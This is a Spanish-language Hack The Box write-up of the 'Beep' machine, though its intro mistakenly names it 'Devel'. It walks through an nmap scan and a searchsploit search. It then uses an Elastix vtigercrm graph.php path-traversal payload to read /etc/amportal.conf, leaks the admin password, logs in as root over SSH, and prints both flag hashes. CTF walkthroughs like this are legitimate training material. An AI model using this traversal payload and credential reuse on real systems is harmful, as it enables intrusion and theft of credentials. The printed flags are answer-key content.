__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[HTB] Beep

Hoy vamos a hackear la maquina de HTB llamada Devel.
  • Video
  • Enumeration
  • Para empezar hacemos un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 10.10.10.7 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 15:17 CEST Nmap scan report for 10.10.10.7 Host is up (0.043s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDST 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.10.10.7/ |_https-redirect: ERROR: Script execution failed (use -d to debug) 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: AUTH-RESP-CODE USER UIDL EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP 111/tcp open rpcbind 2 (RPC #100000) 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: IDLE NAMESPACE MULTIAPPEND OK ACL ATOMIC URLAUTHA0001 X-NETSCAPENCES ANNOTATEMORE CHILDREN RENAME CATENATE ID CONDSTORE NO LITERAL+ IMAP4rev1 SORT= 443/tcp open ssl/https? |_ssl-date: 2020-05-09T13:21:41+00:00; +1s from scanner time. 879/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) 4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (include 4445/tcp open upnotifyp? 4559/tcp open hylafax HylaFAX 4.3.10 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org Nmap done: 1 IP address (1 host up) scanned in 378.53 seconds
    Al visitar http://10.10.10.7 podemos ver que se trata de elastix. Buscamos algun exploit que pueda servirnos.
    sml@Cassandra:~$ searchsploit elastix ------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------- ---------------------------------------- Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vu | exploits/php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Script | exploits/php/webapps/34942.txt Elastix 2.2.0 - 'graph.php' Local File Inc | exploits/php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php FreePBX 2.10.0 / Elastix 2.2.0 - Remote Co | exploits/php/webapps/18650.py ------------------------------------------- ---------------------------------------- Shellcodes: No Result
  • Exploitation
  • Usaremos Elastix 2.2.0 - 'graph.php' Local File Inc, vamos a ver que hace el exploit.
    sml@Cassandra:~$ cat /usr/share/exploitdb/exploits/php/webapps/37637.pl ---SNIP--- #LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf %00&module=Accounts&action ---SNIP---
    Bien, se trata de un LFI, asi que lo probamos visitando: https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../ /etc/amportal.conf%00&module=Accounts&action En todo el texto que aparece, el que nos interesa es el siguiente: AMPMGRPASS=jEhdIekWmdjE Nos logueamos utilizando la password encontrada en el paso anterior.
    sml@Cassandra:~$ ssh root@10.10.10.7 Unable to negotiate with 10.10.10.7 port 22: no matchinTheir offer: diffie-hellman-group-exchange-sha1,diffie-ellman-group1-sha1 sml@Cassandra:~$ ssh -oKexAlgorithms=+diffie-hellman-gr The authenticity of host '10.10.10.7 (10.10.10.7)' can' RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg Are you sure you want to continue connecting (yes/no/[f Warning: Permanently added '10.10.10.7' (RSA) to the li root@10.10.10.7's password: Last login: Tue Jul 16 11:45:47 2019 Welcome to Elastix ---------------------------------------------------- To access your Elastix System, using a separate worksta Open the Internet Browser using the following URL: http://10.10.10.7 [root@beep ~]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon)el)
  • user.txt
  • [root@beep ~]# cd /home [root@beep home]# ls fanis spamfilter [root@beep home]# cd fanis [root@beep fanis]# ls user.txt [root@beep fanis]# cat user.txt aeff3def0c765c2677b94715cffa73ac
  • root.txt
  • [root@beep fanis]# cd /root [root@beep ~]# ls anaconda-ks.cfg install.log.syslog webmin-1 elastix-pr-2.2-1.i386.rpm postnochroot install.log root.txt [root@beep ~]# cat root.txt d88e006123842106982acce0aaf453f0 [root@beep ~]#
  • End
  • Y con esto ya tendriamos el flag del "user" y el flag de "root".